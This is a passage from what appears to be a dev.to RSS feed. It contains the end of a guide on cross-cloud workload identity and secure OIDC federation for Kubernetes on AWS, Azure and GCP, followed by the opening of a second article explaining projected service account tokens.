&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;:aud"&lt;/span&gt;: &lt;span class="s2"&gt;"*"&lt;/span&gt;

&lt;span class="c"&gt;# ❌ Avoid using Azure audience for AWS (works but not best practice)&lt;/span&gt;
&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;:aud"&lt;/span&gt;: &lt;span class="s2"&gt;"api://AzureADTokenExchange"&lt;/span&gt;  &lt;span class="c"&gt;# For AWS targets&lt;/span&gt;

&lt;span class="c"&gt;# ✅ Use cloud-specific audience matching&lt;/span&gt;
&lt;span class="c"&gt;# For AWS:&lt;/span&gt;
&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;:aud"&lt;/span&gt;: &lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;

&lt;span class="c"&gt;# For Azure:&lt;/span&gt;
&lt;span class="s2"&gt;"audiences"&lt;/span&gt;: &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"api://AzureADTokenExchange"&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;

&lt;span class="c"&gt;# For GCP:&lt;/span&gt;
&lt;span class="nt"&gt;--allowed-audiences&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL/providers/PROVIDER"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2. Exact Subject Matching
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ❌ Avoid broad patterns in production&lt;/span&gt;
&lt;span class="nt"&gt;--attribute-condition&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"assertion.sub.startsWith('system:serviceaccount:')"&lt;/span&gt;

&lt;span class="c"&gt;# ✅ Use exact namespace and service account&lt;/span&gt;
&lt;span class="nt"&gt;--attribute-condition&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"assertion.sub=='system:serviceaccount:production:app-sa'"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3. Dedicated Identity Pools per Cluster
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Create separate Workload Identity Pools for each cluster&lt;/li&gt;
&lt;li&gt;Avoid sharing pools across environments&lt;/li&gt;
&lt;li&gt;Simplifies rotation and isolation&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  4. Resource-Scoped IAM
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ❌ Avoid project/subscription-wide roles&lt;/span&gt;
gcloud projects add-iam-policy-binding &lt;span class="nv"&gt;$PROJECT_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:sa@project.iam.gserviceaccount.com"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

&lt;span class="c"&gt;# ✅ Use bucket-level or resource-level IAM&lt;/span&gt;
gsutil iam ch serviceAccount:sa@project.iam.gserviceaccount.com:objectViewer &lt;span class="se"&gt;\&lt;/span&gt;
  gs://specific-bucket
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  5. OIDC Provider Rotation
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Rotate cluster OIDC providers when cluster is recreated&lt;/li&gt;
&lt;li&gt;Update federated credentials accordingly&lt;/li&gt;
&lt;li&gt;Maintain backward compatibility during transition&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  6. Comprehensive Audit Logging
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# AWS: Enable CloudTrail&lt;/span&gt;
aws cloudtrail create-trail &lt;span class="nt"&gt;--name&lt;/span&gt; cross-cloud-audit

&lt;span class="c"&gt;# Azure: Enable Azure Monitor&lt;/span&gt;
az monitor diagnostic-settings create

&lt;span class="c"&gt;# GCP: Audit logs are enabled by default&lt;/span&gt;
gcloud logging &lt;span class="nb"&gt;read&lt;/span&gt; &lt;span class="s2"&gt;"protoPayload.serviceName=sts.googleapis.com"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  7. Avoid Common Anti-Patterns
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;❌ Don't use &lt;code&gt;roles/storage.admin&lt;/code&gt; when read access suffices&lt;/li&gt;
&lt;li&gt;❌ Don't use &lt;code&gt;startsWith()&lt;/code&gt; conditions in production&lt;/li&gt;
&lt;li&gt;❌ Don't share service accounts across namespaces&lt;/li&gt;
&lt;li&gt;❌ Don't use overly permissive audience claims&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Performance Considerations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Token Caching
&lt;/h3&gt;

&lt;p&gt;Cloud SDKs automatically cache tokens, but you can optimize:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Reuse clients instead of creating new ones
# Bad - creates new client each time
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;bad_example&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;s3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s3&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;s3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="c1"&gt;# Good - reuse client
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;good_example&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;s3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s3&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;s3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Connection Pooling
&lt;/h3&gt;

&lt;p&gt;Use connection pooling for better performance:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;botocore.config&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Config&lt;/span&gt;

&lt;span class="n"&gt;config&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Config&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;max_pool_connections&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;retries&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;max_attempts&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;s3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s3&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Comparison Matrix
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;EKS (IRSA)&lt;/th&gt;
&lt;th&gt;AKS (Workload Identity)&lt;/th&gt;
&lt;th&gt;GKE (Workload Identity)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Setup Complexity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Native Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AWS&lt;/td&gt;
&lt;td&gt;Azure&lt;/td&gt;
&lt;td&gt;GCP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cross-cloud Support&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Via OIDC&lt;/td&gt;
&lt;td&gt;Via Federated Credentials&lt;/td&gt;
&lt;td&gt;Via WIF Pools&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Token Injection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Automatic&lt;/td&gt;
&lt;td&gt;Automatic (webhook)&lt;/td&gt;
&lt;td&gt;Automatic&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Token Lifetime&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1 hour (configurable)&lt;/td&gt;
&lt;td&gt;24 hours (default)&lt;/td&gt;
&lt;td&gt;1 hour (default)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Audience Customization&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Pod Identity Webhook&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Not required&lt;/td&gt;
&lt;td&gt;Required&lt;/td&gt;
&lt;td&gt;Not required&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Annotation Required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Role ARN&lt;/td&gt;
&lt;td&gt;Client ID&lt;/td&gt;
&lt;td&gt;GSA Email&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Native to K8s&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (GKE only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Requires External JSON&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No (AWS), Yes (cross-cloud)&lt;/td&gt;
&lt;td&gt;No (Azure), Yes (cross-cloud)&lt;/td&gt;
&lt;td&gt;No (GCP), Yes (cross-cloud)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;STS Call Required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Most Complex Setup&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;High (for cross-cloud)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Cloud-Specific Characteristics
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Characteristic&lt;/th&gt;
&lt;th&gt;AWS&lt;/th&gt;
&lt;th&gt;Azure&lt;/th&gt;
&lt;th&gt;GCP&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Validation Method&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AssumeRoleWithWebIdentity&lt;/td&gt;
&lt;td&gt;Federated credential match&lt;/td&gt;
&lt;td&gt;Workload Identity Pool exchange&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Token Exchange&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Direct STS call&lt;/td&gt;
&lt;td&gt;Entra ID token exchange&lt;/td&gt;
&lt;td&gt;Multi-step (STS → SA impersonation)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Best Practice Audience&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sts.amazonaws.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;api://AzureADTokenExchange&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;WIF Pool-specific&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Audience Flexibility&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Strict (validates aud claim)&lt;/td&gt;
&lt;td&gt;Strict (must match federated credential)&lt;/td&gt;
&lt;td&gt;Flexible (configured in pool provider)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Thumbprint Required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (root CA)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Migration Guide
&lt;/h2&gt;

&lt;h3&gt;
  
  
  From Static Credentials to Workload Identity
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Audit current credential usage&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find all secrets with credentials&lt;/span&gt;
kubectl get secrets &lt;span class="nt"&gt;--all-namespaces&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; json | &lt;span class="se"&gt;\&lt;/span&gt;
  jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.items[] | select(.type=="Opaque") | .metadata.name'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 2: Set up workload identity&lt;/strong&gt; (follow scenarios above)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3: Deploy test pod&lt;/strong&gt; with workload identity&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 4: Validate access&lt;/strong&gt; before removing static credentials&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 5: Update application code&lt;/strong&gt; to remove explicit credential loading&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 6: Remove credential secrets&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete secret &amp;lt;credential-secret-name&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 7: Monitor and verify&lt;/strong&gt; in production&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Cross-cloud authentication using workload identity provides a secure, scalable, and maintainable approach to multi-cloud Kubernetes deployments. By leveraging OIDC federation, you eliminate the risks associated with static credentials while gaining fine-grained access control and better auditability.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Takeaways:
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Always prefer workload identity&lt;/strong&gt; over static credentials&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use native integrations&lt;/strong&gt; when available (IRSA for EKS, Workload Identity for AKS/GKE)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Follow the principle of least privilege&lt;/strong&gt; in IAM policies with resource-specific scopes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Implement strict claim matching&lt;/strong&gt; in production (exact &lt;code&gt;sub&lt;/code&gt; and &lt;code&gt;aud&lt;/code&gt; matching)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test thoroughly&lt;/strong&gt; before production deployment&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitor and audit&lt;/strong&gt; authentication patterns regularly with cloud-native logging&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Keep SDKs updated&lt;/strong&gt; for the latest security patches&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use dedicated identity pools&lt;/strong&gt; per cluster in production&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rotate OIDC providers&lt;/strong&gt; when clusters are recreated&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Additional Resources:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html" rel="noopener noreferrer"&gt;AWS IRSA Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://azure.github.io/azure-workload-identity/" rel="noopener noreferrer"&gt;Azure Workload Identity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/iam/docs/workload-identity-federation" rel="noopener noreferrer"&gt;GCP Workload Identity Federation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://openid.net/connect/" rel="noopener noreferrer"&gt;OIDC Specification&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  Final Cleanup
&lt;/h3&gt;

&lt;p&gt;If you're completely done with all scenarios and want to delete the Kubernetes clusters, refer to the Cluster Cleanup section in the prerequisites.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This guide was created to help platform engineers implement secure, passwordless authentication across multiple cloud providers in Kubernetes environments.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>azure</category>
      <category>aws</category>
      <category>gcp</category>
    </item>
    <item>
      <title>Understanding Kubernetes Projected Service Account Tokens</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Sun, 08 Feb 2026 12:37:45 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/understanding-kubernetes-projected-service-account-tokens-205f</link>
      <guid>https://dev.to/piyushjajoo/understanding-kubernetes-projected-service-account-tokens-205f</guid>
      <description>&lt;p&gt;Service account tokens are the cornerstone of pod authentication in Kubernetes. With the introduction of &lt;strong&gt;projected service account tokens&lt;/strong&gt;, Kubernetes has significantly improved security and flexibility in how pods authenticate to the API server and external services.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Are Projected Service Account Tokens?
&lt;/h2&gt;

&lt;p&gt;Projected service account tokens are time-bound, audience-scoped JSON Web Tokens (JWTs) that replace the legacy non-expiring service account tokens. They provide enhanced security through:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Time-bound expiration&lt;/strong&gt;: Tokens automatically expire and are rotated&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audience binding&lt;/strong&gt;: Tokens can be scoped to specific audiences&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automatic rotation&lt;/strong&gt;: The kubelet automatically refreshes tokens before expiration&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  The Problem with Legacy Service Account Tokens
&lt;/h3&gt;

&lt;p&gt;Before projected tokens, Kubernetes used &lt;strong&gt;legacy service account tokens&lt;/strong&gt; that had several security limitations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Never expire&lt;/strong&gt;: Once created, they remain valid indefinitely unless manually revoked&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No audience restriction&lt;/strong&gt;: Can be used to authenticate to any service that accepts them&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stored as Secrets&lt;/strong&gt;: Persisted in etcd, increasing the attack surface&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Broad scope&lt;/strong&gt;: If compromised, provide unrestricted access to the API server&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Manual rotation&lt;/strong&gt;: Required manual intervention to refresh or rotate&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These limitations meant that if a token was leaked or a pod was compromised, attackers could potentially maintain persistent access to your cluster. Projected tokens solve these problems by being short-lived, automatically rotated, and scoped to specific audiences.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk8udv1ba5ty47t0qowdp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk8udv1ba5ty47t0qowdp.png" alt="overview" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How Projected Tokens Work
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Understanding the TokenRequest API
&lt;/h3&gt;

&lt;p&gt;The &lt;strong&gt;TokenRequest API&lt;/strong&gt; is a Kubernetes API (not provided by cloud providers) that generates service account tokens on-demand. It's part of the core Kubernetes API server and was introduced in Kubernetes 1.12 (stable in 1.20).&lt;/p&gt;

&lt;p&gt;Key characteristics:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Endpoint&lt;/strong&gt;: &lt;code&gt;/api/v1/namespaces/{namespace}/serviceaccounts/{name}/token&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Purpose&lt;/strong&gt;: Creates short-lived, audience-bound tokens for service accounts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Parameters&lt;/strong&gt;: Accepts expiration time and audience claims&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Signature&lt;/strong&gt;: Tokens are signed by the Kubernetes API server's private key&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When you use a projected volume, the kubelet automatically calls this API on your behalf to request tokens, eliminating the need for manual token management.&lt;/p&gt;

&lt;h3&gt;
  
  
  What is a Projected Volume?
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;projected volume&lt;/strong&gt; is a special volume type in Kubernetes that can project (combine) multiple volume sources into a single directory. Think of it as a way to mount different types of data into your pod from various sources.&lt;/p&gt;

&lt;p&gt;Common sources that can be projected:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;serviceAccountToken&lt;/strong&gt;: Dynamically generated tokens via TokenRequest API&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;configMap&lt;/strong&gt;: Configuration data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;secret&lt;/strong&gt;: Sensitive data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;downwardAPI&lt;/strong&gt;: Pod metadata&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For service account tokens, projected volumes enable the kubelet to:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Request fresh tokens from the TokenRequest API&lt;/li&gt;
&lt;li&gt;Automatically refresh tokens before expiration&lt;/li&gt;
&lt;li&gt;Mount tokens as files in the pod's filesystem&lt;/li&gt;
&lt;li&gt;Handle all the complexity of token lifecycle management&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is different from the legacy approach where tokens were stored as static Secrets and mounted directly.&lt;/p&gt;

&lt;h3&gt;
  
  
  Token Generation Flow
&lt;/h3&gt;

&lt;p&gt;Projected tokens use the TokenRequest API to generate short-lived tokens on-demand. Here's the typical flow:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foo74pfipig47iy40sa78.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foo74pfipig47iy40sa78.png" alt="token generation flow" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Basic Configuration
&lt;/h2&gt;

&lt;p&gt;Here's a simple example of configuring a projected service account token:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;token-demo&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-service-account&lt;/span&gt;
